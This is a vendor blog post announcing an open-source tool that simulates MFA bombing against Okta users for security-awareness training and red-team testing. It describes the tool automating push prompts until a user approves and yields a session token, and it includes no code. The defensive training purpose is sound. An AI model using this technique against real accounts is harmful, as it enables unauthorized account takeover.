Security is a cat and mouse arms race. Multi-factor Authentication was supposed to stop the attackers in their tracks, but nature being what it is, has led to hackers finding creative ways around our additional layers of protection.
Attacks on Uber, Microsoft, and Cisco, just to name a few, have all utilized a tactic called MFA bombing to wear down their targets into submission with waves of MFA prompts, coercing them into approving their requests and allowing them to successfully complete their breach.
You can learn more about MFA bombing in our video here below.
While Microsoft is adding new features to help fight against MFA fatigue, security teams still need to engage with their workforce to build resilience against these attacks.
Thankfully, Authomize’s research team is here to help with a new open source training tool.
Check out our tool here:
Who is it Good for?
Focusing on defending access to Okta, this tool provides value for both the Blue and Red teams.
For the defense crew, use the tool to send prompts to all relevant users, raising awareness of the issue and testing their acumen.
Some blue teams may decide to shift over to being purple and use it to try and elevate their privileges as part of the testing.
If you have creds for a user, this will automate the continuous bombardment of a user with MFA push requests until they relent, giving you a session token to login with.
A Gentle Reminder to Play Nice
Our hope is that everyone will find this tool useful and we can play a part in making your team a little bit more aware and a lot safer.
Our one suggestion/request is to use this tool conscientiously, utilizing it as an opportunity to educate and not to hit those who fall for the test with a big stick.
Just like sending phishing emails can be useful for training, the goal should not be to alienate your workforce.
At the end of the day, striking the right balance between running them through the paces while maintaining a good working relationship wherein they will still want to reach out to you when an issue arises is essential.
Have fun and let us know what you think of our tool by responding in the repo or to this post.